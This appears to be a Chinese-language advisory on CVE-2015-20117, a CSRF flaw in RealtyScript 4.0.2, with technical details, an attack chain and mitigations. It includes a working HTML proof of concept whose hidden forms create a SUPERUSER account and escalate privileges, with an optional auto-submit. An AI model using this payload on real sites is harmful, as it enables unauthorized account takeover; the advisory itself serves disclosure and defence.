CVE-2015-20117 RealtyScript 4.0.2 跨站请求伪造漏洞导致未授权用户创建

漏洞信息

漏洞编号

CVE-2015-20117

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Next Click Ventures RealtyScript 4.0.2

漏洞概述

CVE-2015-20117是Next Click Ventures公司开发的RealtyScript 4.0.2版本中存在的一个跨站请求伪造（CSRF）安全漏洞。RealtyScript是一款流行的房地产网站管理和房源管理系统，广泛应用于房产中介公司和房地产网站平台。该漏洞源于系统对用户创建和权限管理操作缺乏有效的CSRF令牌验证机制。攻击者可以通过构造恶意的HTML表单或链接，诱骗已登录的管理员或普通用户在不知情的情况下向系统的用户管理端点发送请求，从而实现未授权的用户账户创建和权限提升。具体而言，攻击者可以利用此漏洞在目标系统上创建任意credentials的新用户账户，甚至可以将新创建的用户提升为SUPERUSER级别的管理员权限。由于该漏洞不需要认证即可发起攻击（PR:N），且攻击过程对用户完全透明（UI:N），因此具有较高的实际威胁性。攻击者可以通过社交工程手段，如发送包含恶意链接的电子邮件或在网站上嵌入恶意代码，来触发针对目标RealtyScript系统的CSRF攻击。此漏洞的CVSS评分为5.3，属于中等严重程度，但考虑到其可能导致完整的系统控制权限被获取，建议相关用户尽快采取修复措施。

技术细节

该CSRF漏洞主要存在于RealtyScript 4.0.2的两个关键管理端点：/admin/addusers.php和/admin/editadmins.php。漏洞的根本原因在于这些用户管理功能缺少CSRF Token验证机制。在正常的Web应用程序安全实践中，涉及敏感操作的表单（如用户创建、权限修改等）应当包含唯一的CSRF令牌，服务器端在处理请求时必须验证该令牌的合法性。然而，RealtyScript的这两处功能点均未实现此类防护。攻击者可以构造一个包含隐藏表单字段的HTML页面，模拟向/admin/addusers.php提交用户创建请求。表单中可指定username、password、email等参数，甚至可以指定role或privilege_level参数来尝试权限提升。类似地，对于/admin/editadmins.php端点，攻击者可以修改现有管理员账户的权限或将新用户添加为SUPERUSER。由于浏览器会自动携带目标域的Cookie信息，如果管理员在有效会话期内访问了攻击者构造的恶意页面，请求将被服务器认为是合法的管理员操作。攻击成功的前提是目标用户当前登录了RealtyScript系统且拥有足够的权限。由于该漏洞影响的是用户创建和权限管理功能，攻击者一旦成功即可获得系统的持久访问权限，甚至可能完全接管整个RealtyScript实例。

攻击链分析

STEP 1

步骤1

攻击者准备阶段：攻击者搭建托管CSRF payload的恶意服务器，或在受控网站上嵌入恶意代码，准备构造好的HTML表单

STEP 2

步骤2

社工阶段：攻击者通过电子邮件、社交媒体、即时通讯等方式向目标RealtyScript系统的管理员或用户发送包含恶意链接或内容的诱饵信息

STEP 3

步骤3

触发阶段：目标用户在已登录RealtyScript系统的情况下访问了攻击者构造的恶意页面，或点击了包含隐藏表单的链接

STEP 4

步骤4

自动提交：浏览器自动加载HTML页面并执行JavaScript，或者用户无意识地点击了页面上的元素，导致隐藏表单自动向/admin/addusers.php或/admin/editadmins.php端点发送POST请求

STEP 5

步骤5

Cookie携带：浏览器自动携带目标域的合法Cookie，服务器无法区分这是管理员的正常操作还是攻击者利用CSRF漏洞发起的恶意请求

STEP 6

步骤6

用户创建成功：服务器处理请求，由于缺少CSRF验证，攻击者指定的任意credentials的新用户账户被成功创建，可能带有SUPERUSER权限

STEP 7

步骤7

持久化访问：攻击者使用创建的账户登录系统，获得持久的后门访问权限，可能进一步控制整个RealtyScript实例或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!DOCTYPE html> <html> <head> <title>RealtyScript CSRF Exploit - CVE-2015-20117</title> </head> <body> <h2>CVE-2015-20117 CSRF Exploit</h2> <p>Submit this form to create an unauthorized admin user...</p>  <form action="http://target-site.com/admin/addusers.php" method="POST" id="exploitForm"> <input type="hidden" name="username" value="attacker_pwned" /> <input type="hidden" name="password" value="P@ssw0rd123!" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="role" value="SUPERUSER" /> <input type="hidden" name="privilege_level" value="99" /> <input type="hidden" name="submit" value="Add User" /> </form>  <form action="http://target-site.com/admin/editadmins.php" method="POST" id="privilegeEscalation"> <input type="hidden" name="user_id" value="1" /> <input type="hidden" name="new_role" value="SUPERUSER" /> <input type="hidden" name="submit" value="Update" /> </form> <script> // Auto-submit on page load (for stealthier attack) // document.getElementById('exploitForm').submit(); console.log('CSRF PoC loaded - form ready for submission'); </script> <p><button onclick="document.getElementById('exploitForm').submit()">Execute Exploit</button></p> </body> </html>

影响范围

Next Click Ventures RealtyScript 4.0.2

防御指南

临时缓解措施

在官方修复补丁发布之前，可采取以下临时缓解措施：1）临时禁用用户自助注册功能，限制用户创建只能通过数据库直接操作；2）使用Web应用防火墙配置CSRF攻击检测规则，对异常的用户创建请求进行拦截；3）增强用户管理页面的访问控制，限制只能从特定IP地址或内网访问；4）定期检查系统日志和用户账户列表，监控是否存在异常的账户创建行为；5）考虑暂时关闭/admin/addusers.php和/admin/editadmins.php端点，直到完成安全修复；6）对管理员账户实施强密码策略和多因素认证，降低账户被滥用的风险。